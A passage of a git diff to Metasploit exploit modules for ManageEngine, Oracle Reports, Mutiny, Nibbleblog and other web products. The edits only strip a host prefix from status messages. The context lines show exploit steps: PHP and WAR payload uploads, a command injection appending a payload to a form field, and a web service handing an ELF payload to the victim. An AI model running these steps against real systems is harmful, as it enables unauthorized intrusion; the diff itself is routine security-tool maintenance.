@@ class Metasploit3 < Msf::Exploit::Remote def check_desktop_central_9(body) if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 - print_status("#{peer} - Detected Desktop Central v9 #{build}") + print_status("Detected Desktop Central v9 #{build}") if ver_lt(build, '90039') return Exploit::CheckCode::Appears else @@ -565,7 +565,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 uses the MySQL database - print_status("#{peer} - Detected Desktop Central v7 (MySQL)") + print_status("Detected Desktop Central v7 (MySQL)") return Exploit::CheckCode::Appears elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ @@ -600,17 +600,17 @@ class Metasploit3 < Msf::Exploit::Remote if ver_lt_eq(build, '6500') # if it's a build below 6500, it will only work if we have a JSP compiler - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") + print_status("Detected Password Manager Pro v6 #{build} (needs a JSP compiler)") return Exploit::CheckCode::Detected elsif ver_lt(build, '6800') # PMP v6 < 6800 uses the MySQL database - print_status("#{peer} - Detected Password Manager Pro v6 #{build} (MySQL)") + print_status("Detected Password Manager Pro v6 #{build} (MySQL)") return Exploit::CheckCode::Appears elsif ver_lt(build, '7003') - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") return Exploit::CheckCode::Appears else - print_status("#{peer} - Detected Password Manager Pro v6 / v7 #{build}") + print_status("Detected Password Manager Pro v6 / v7 #{build}") Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index ea739f7e8f..7ea5105ad1 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -365,9 +365,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end - print_status("#{peer} - Selecting target...") + print_status("Selecting target...") @my_target = pick_target - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 @@ -402,7 +402,7 @@ class Metasploit3 < Msf::Exploit::Remote # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) - print_status("#{peer} - Uploading bogus file...") + print_status("Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 fail_with(Failure::Unknown, "#{peer} - Bogus file upload failed") @@ -410,10 +410,10 @@ class Metasploit3 < Msf::Exploit::Remote end # Now send the actual payload - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else fail_with(Failure::Unknown, "#{peer} - EAR upload failed") end @@ -422,7 +422,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/manageengine_sd_uploader.rb b/modules/exploits/multi/http/manageengine_sd_uploader.rb index db8164c450..5b8c04f0ce 100644 --- a/modules/exploits/multi/http/manageengine_sd_uploader.rb +++ b/modules/exploits/multi/http/manageengine_sd_uploader.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") register_files_for_cleanup(jboss_path.gsub('../../','../') + "/null/" + ear_file_name) register_files_for_cleanup("Attachments/null/" + rand_file) diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb index 75c7502c84..55a33c3fe7 100644 --- a/modules/exploits/multi/http/mma_backdoor_upload.rb +++ b/modules/exploits/multi/http/mma_backdoor_upload.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) payload_name = "#{rand_text_alpha(5)}.php" - print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor") + print_status("Trying to upload #{payload_name} to mma.php Backdoor") data = Rex::MIME::Message.new @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.body =~ /uplod d0n3 in SAME file/ - print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...") + print_good("Our payload #{payload_name} has been uploaded. Calling payload...") register_files_for_cleanup(payload_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index 1882bd0b24..d58161de13 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload payload # - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'uri' => normalize_uri(base, "/includes/savepage.php"), 'vars_get' => { @@ -97,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from server, will not continue.") + print_error("No response from server, will not continue.") return end # # Run payload # - print_status("#{peer} - Requesting '#{php_fname}'") + print_status("Requesting '#{php_fname}'") send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) handler diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 61272300d7..5053599cb9 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote def check fingerprint = rand_text_alpha(5) - vprint_status("#{peer} - Sending check...") + vprint_status("Sending check...") begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload...") + print_status("Sending payload...") http_send_cmd(payload.encoded) end diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 8b06d3c753..485fc65d39 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -98,20 +98,20 @@ class Metasploit3 < Msf::Exploit::Remote ] unless not @netmask_eth0 cmds << %Q|rm /tmp/#{@elfname}.elf| unless target.name =~ /CMD/ - print_status("#{peer} - Restoring Network Information and Cleanup...") + print_status("Restoring Network Information and Cleanup...") begin session.shell_command_token(cmds.join(" ; ")) rescue - print_error("#{peer} - Automatic restore and cleanup didn't work, please use these commands:") + print_error("Automatic restore and cleanup didn't work, please use these commands:") cmds.each { |cmd| print_warning(cmd) } end - print_good("#{peer} - Restoring and Cleanup successful") + print_good("Restoring and Cleanup successful") end def start_web_service - print_status("#{peer} - Setting up the Web Service...") + print_status("Setting up the Web Service...") if datastore['SSL'] ssl_restore = true @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote resource_uri = '/' + @elfname + '.elf' service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}" - print_status("#{peer} - Starting up our web service on #{service_url} ...") + print_status("Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote # wait for the data to be sent def wait_linux_payload - print_status("#{peer} - Waiting for the victim to request the ELF payload...") + print_status("Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) @@ -146,23 +146,23 @@ class Metasploit3 < Msf::Exploit::Remote end end - #print_status("#{peer} - Giving time to the payload to execute...") + #print_status("Giving time to the payload to execute...") #select(nil, nil, nil, 20) unless session_created? - print_status("#{peer} - Shutting down the web service...") + print_status("Shutting down the web service...") stop_service end # Handle incoming requests from the target def on_request_uri(cli, request) - vprint_status("#{peer} - on_request_uri called, #{request} requested") + vprint_status("on_request_uri called, #{request} requested") if (not @elf_data) - print_error("#{peer} - A request came in, but the ELF archive wasn't ready yet!") + print_error("A request came in, but the ELF archive wasn't ready yet!") return end - print_good("#{peer} - Sending the ELF payload to the target...") + print_good("Sending the ELF payload to the target...") @elf_sent = true send_response(cli, @elf_data) end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Login with the provided credentials...") + print_status("Login with the provided credentials...") res = send_request_cgi({ 'method' => 'POST', @@ -194,13 +194,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.get_cookies =~ /JSESSIONID=(.*);/ - print_good("#{peer} - Login successful") + print_good("Login successful") session = $1 else fail_with(Failure::NoAccess, "#{peer} - Unable to login in Mutiny") end - print_status("#{peer} - Leaking current Network Information...") + print_status("Leaking current Network Information...") res = send_request_cgi({ 'method' => 'GET', @@ -216,16 +216,16 @@ class Metasploit3 < Msf::Exploit::Remote static_route_address = (res.body =~ /<input class="textInput" type="text" name="staticRouteAddress" value="(.*)" \/>/ ? $1 : "") static_route_netmask = (res.body =~ /<input class="textInput" type="text" name="staticRouteNetmask" value="(.*)" \/>/ ? $1 : "") static_route_gateway = (res.body =~ /<input class="textInput" type="text" name="staticRouteGateway" value="(.*)" \/>/ ? $1 : "") - print_good("#{peer} - Information leaked successfully") + print_good("Information leaked successfully") else - print_error("#{peer} - Error leaking information, trying to exploit with random values") + print_error("Error leaking information, trying to exploit with random values") end if target.name =~ /CMD/ injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3)) injection << "; #{payload.encoded}" else - print_status("#{peer} - Generating the ELF Payload...") + print_status("Generating the ELF Payload...") @elf_data = generate_payload_exe @elfname = Rex::Text.rand_text_alpha(3+rand(3)) service_url = start_web_service @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end - print_status("#{peer} - Exploiting Command Injection...") + print_status("Exploiting Command Injection...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index 290931c1c4..a0c53a5fe2 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin.php'), @@ -103,13 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote return end - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = do_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Nibbleblog.") + vprint_good("Authenticated with Nibbleblog.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = Rex::MIME::Message.new @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('auto', nil, nil, 'form-data; name="image_option"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'admin.php'), @@ -144,14 +144,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Unable to upload payload.') end - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") php_fname = 'image.php' payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_fname) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb index 16676fc6bd..d9017acff1 100644 --- a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb +++ b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # does not allow us to deploy WARs. Fix that by uploading a new context.xml file. # The file we are uploading has the same content apart from privileged="false" and lots of XML comments. # After replacing the context.xml file let's upload the WAR again. - print_status("#{peer} - Replacing Tomcat context file") + print_status("Replacing Tomcat context file") send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote }) else # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directories") + print_status("Creating upload directories") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(servlet_path), @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -117,14 +117,14 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 500 error or a 200 OK when the upload is successful. if res and (res.code == 500 or res.code == 200) - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") sleep(datastore['SLEEP']) else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end - print_status("#{peer} - Executing payload, wait for session...") + print_status("Executing payload, wait for session...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep_counter = 0 while not session_created? if sleep_counter == datastore['SLEEP'] - print_error("#{peer} - Failed to get a shell, let's try one more time") + print_error("Failed to get a shell, let's try one more time") upload_war_and_exec(true, app_base) return end diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index 8c3f73bd2c..aa96081ab7 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - vprint_good "#{peer} - Windows install detected " + vprint_good "Windows install detected " path = $1.gsub("\\", "/") - vprint_status "#{peer} - Path: #{path}" + vprint_status "Path: #{path}" elsif res.body =~ /\/(.*)\/showenv/ - vprint_good "#{peer} - Linux install detected" - vprint_status "#{peer} - Path: #{$1}" + vprint_good "Linux install detected" + vprint_status "Path: #{$1}" else return Exploit::CheckCode::Safe end @@ -103,10 +103,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.downcase.exclude?("<html>") - vprint_good "#{peer} - URLPARAMETER is vulnerable" + vprint_good "URLPARAMETER is vulnerable" return Exploit::CheckCode::Vulnerable else - vprint_status "#{peer} - URLPARAMETER is not vulnerable" + vprint_status "URLPARAMETER is not vulnerable" return Exploit::CheckCode::Safe end @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote @payload_dir = datastore['PAYDIR'] @local_path = "" - print_status "#{peer} - Querying showenv!" + print_status "Querying showenv!" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"), 'method' => 'GET', @@ -127,17 +127,17 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Windows install detected " + print_good "Query succeeded!" + print_status "Windows install detected " @local_path = $1.gsub("\\", "/") - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" elsif res.body =~ /\/(.*)\/showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Linux install detected" + print_good "Query succeeded!" + print_status "Linux install detected" @local_path = $1 - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" else - print_status "#{peer} - Query failed" + print_status "Query failed" fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable") end else @@ -145,14 +145,14 @@ class Metasploit3 < Msf::Exploit::Remote end if datastore['EXTURL'].blank? - print_status "#{peer} - Hosting payload locally ..." + print_status "Hosting payload locally ..." begin Timeout.timeout(datastore['HTTPDELAY']) {super} rescue Timeout::Error end exec_payload else - print_status "#{peer} - Using external url for payload delivery ..." + print_status "Using external url for payload delivery ..." @payload_url = datastore['EXTURL'] upload_payload exec_payload @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def upload_payload - print_status "#{peer} - Uploading payload ..." + print_status "Uploading payload ..." path = "/#{@local_path}#{@payload_dir}#{@payload_name}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"), @@ -191,9 +191,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good "#{peer} - Payload hopefully uploaded!" + print_good "Payload hopefully uploaded!" else - print_status "#{peer} - Payload upload failed" + print_status "Payload upload failed" end end @@ -202,11 +202,11 @@ class Metasploit3 < Msf::Exploit::Remote gen_payload_name = rand_text_alpha(8+rand(8)) encoded_pl = Rex::Text.encode_base64(generate_payload_exe) - print_status "#{peer} - Building JSP shell ..." + print_status "Building JSP shell ..." len = encoded_pl.length if len >= 60000 #java string size limit ~60k workaround - print_status "#{peer} - Adjusting shell due to payload size" + print_status "Adjusting shell due to payload size" pl_first = encoded_pl.slice(0, 60000) pl_second = encoded_pl.slice(60000, len) big_payload = true @@ -252,8 +252,8 @@ class Metasploit3 < Msf::Exploit::Remote end def exec_payload - print_status("#{peer} - Our payload is at: /reports#{@payload_dir}#{@payload_name}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: /reports#{@payload_dir}#{@payload_name}") + print_status("Executing payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name), @@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good("#{peer} - Payload executed!") + print_good("Payload executed!") else - print_status("#{peer} - Payload execution failed") + print_status("Payload execution failed") end end end diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb index 3db627caf4..e260323353 100644 --- a/modules/exploits/multi/http/pandora_upload_exec.rb +++ b/modules/exploits/multi/http/pandora_upload_exec.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Unknown @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote end # upload PHP payload to images/[fname] - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php, cookies) @@ -146,13 +146,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (images/#{@fname})") + print_status("Executing payload (images/#{@fname})") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 8f8a58f69d..56dcda56d7 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a cookie, bail! if res and res.get_cookies =~ /(PHPVolunteerManagent=\w+);*/ cookie = $1 - vprint_status("#{peer} - Found cookie: #{cookie}") + vprint_status("Found cookie: #{cookie}") else return nil end @@ -194,49 +194,49 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] cookie = login(base, username, password) if cookie.nil? - print_error("#{peer} - Login failed with \"#{username}:#{password}\"") + print_error("Login failed with \"#{username}:#{password}\"") return end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") # Take a snapshot of the uploads directory # Viewing this doesn't actually require the user to login first, # but we supply the cookie anyway to act more like a real user. - print_status("#{peer} - Enumerating all the uploads...") + print_status("Enumerating all the uploads...") before = peek_uploads(base, cookie) if before.nil? - print_error("#{peer} - Unable to enumerate original uploads") + print_error("Unable to enumerate original uploads") return end # Upload our PHP shell - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alpha(rand(10)+6) + '.php' desc = rand_text_alpha(rand(10)+5) php = %Q|<?php #{payload.encoded} ?>| res = upload(base, cookie, fname, php, desc) if res.nil? or res.body !~ /The file was successfuly uploaded/ - print_error("#{peer} - Failed to upload our file") + print_error("Failed to upload our file") return end # Now that we've uploaded our shell, let's take another snapshot # of the uploads directory. - print_status("#{peer} - Enumerating new uploads...") + print_status("Enumerating new uploads...") after = peek_uploads(base, cookie) if after.nil? - print_error("#{peer} - Unable to enumerate latest uploads") + print_error("Unable to enumerate latest uploads") return end # Find the filename of our uploaded shell files = get_my_file(before.body, after.body) if files.empty? - print_error("#{peer} - No new file(s) found. The upload probably failed.") + print_error("No new file(s) found. The upload probably failed.") return else - vprint_status("#{peer} - Found these new files: #{files.inspect}") + vprint_status("Found these new files: #{files.inspect}") end # There might be more than 1 new file, at least execute the first 10 diff --git a/modules/exploits/multi/http/phpfilemanager_rce.rb b/modules/exploits/multi/http/phpfilemanager_rce.rb index 5223279b46..ee92c2d006 100644 --- a/modules/exploits/multi/http/phpfilemanager_rce.rb +++ b/modules/exploits/multi/http/phpfilemanager_rce.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 - print_good("#{peer} - Logged in to the file manager") + print_good("Logged in to the file manager") cookie = res.get_cookies cookie else diff --git a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb index 6ce71ac09d..2eed181293 100644 --- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb +++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = normalize_uri(uri + "/" + payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 340e9c6f02..ee5adbdc09 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\"")) post_data = data.to_s - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"), @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = "#{upload_dir}#{@payload_name}" - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index e00a483e23..9a7f37a6ca 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send payload - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, vuln_url), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send login request - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -103,14 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => vars_post }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - print_error("#{peer} - Connection failed") + print_error("Connection failed") return false end if res and res.code == 200 and res.body =~ /Loading styles and images/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = execute_command("echo #{fingerprint}") if res and res.body =~ /#{fingerprint}/ @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe @@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote # upload payload code = "<?php #{payload.encoded} ?>" - print_status("#{peer} - Sending payload '#{@fname}' (#{code.length} bytes)") + print_status("Sending payload '#{@fname}' (#{code.length} bytes)") begin res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function } ) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(@fname) else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote upload # execute payload - print_status("#{peer} - Retrieving file '#{@fname}'") + print_status("Retrieving file '#{@fname}'") send_request_cgi({'uri' => normalize_uri(target_uri.path, "#{@fname}")}) end end diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 2b5fe040b1..ad3841acbc 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote end @clean_files.each do |f| - print_warning("#{peer} - Removing: #{f}") + print_warning("Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote cli.shell_command_token("rm #{f}") end rescue ::Exception => e - print_error("#{peer} - Unable to remove #{f}: #{e.message}") + print_error("Unable to remove #{f}: #{e.message}") end end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] # Get user data - vprint_status("#{peer} - Enumerating user data") + vprint_status("Enumerating user data") res = send_request_raw({ 'uri' => "#{base}/index.php/home/myAccount", 'cookie' => cookie @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote return {} if not res if res.code == 404 - print_error("#{peer} - #{username} does not actually have a 'myAccount' page") + print_error("#{username} does not actually have a 'myAccount' page") return {} end @@ -208,18 +208,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - Unable to request the file") + print_error("Unable to request the file") return end fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || '' if fname.empty? - print_error("#{peer} - Unable to extract the real filename") + print_error("Unable to extract the real 